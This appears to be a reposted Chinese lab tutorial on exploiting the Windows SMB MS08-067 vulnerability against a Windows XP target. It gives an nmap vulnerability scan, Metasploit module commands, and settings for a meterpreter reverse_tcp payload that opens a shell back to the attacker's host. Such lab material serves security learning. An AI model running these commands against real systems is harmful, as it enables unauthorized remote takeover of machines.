ICode9

精准搜索请尝试: 精确搜索
首页 > 系统相关> 文章详细

MS-08-067 windows smb服务 远程命令执行漏洞

2022-03-29 10:02:03  阅读:236  来源: 互联网

标签:067 windows 08 漏洞 smb nmap


漏洞概要

MS-08-067是Windows平台中smb服务445端口的远程代码执行漏洞
利用成功可以远程控制主机
影响范围为:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7

实验场景

攻击机:kali2022msfconsole利用
靶机:windows xp

漏洞利用

使用ifconfigipconfig获取攻击机和靶机的IP地址
攻击机IP:172.16.1.117

靶机IP:172.16.1.116

nmap的默认脚本在/usr/share/nmap/scripts,ls -l| grep 08-67筛选漏洞相关模块

使用nmap的漏洞扫描脚本smb-vuln-ms08-067扫描靶机是否存在ms-08-067漏洞

nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n


发现存在漏洞,使用msfconsole进行利用
msfconsole启动漏洞平台

查找漏洞利用脚本

search ms08_067


使用漏洞利用模块,并使用show options查看漏洞利用模块配置参数

use exploit/windows/smb/ms08_067_netapi
show options

Requiredyes是必须要设置的参数

在最新版kali中,对常见的漏洞自动选择了合适的payload,例如这里的windows/meterpreter/reverse_tcp,并且配置自动配置了反弹会话的IP地址和端口
就是我们本机的IP和端口

如果不是这个payload需要我们手动设置

set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444

标签:067,windows,08,漏洞,smb,nmap
来源: https://www.cnblogs.com/Junglezt/p/16070292.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有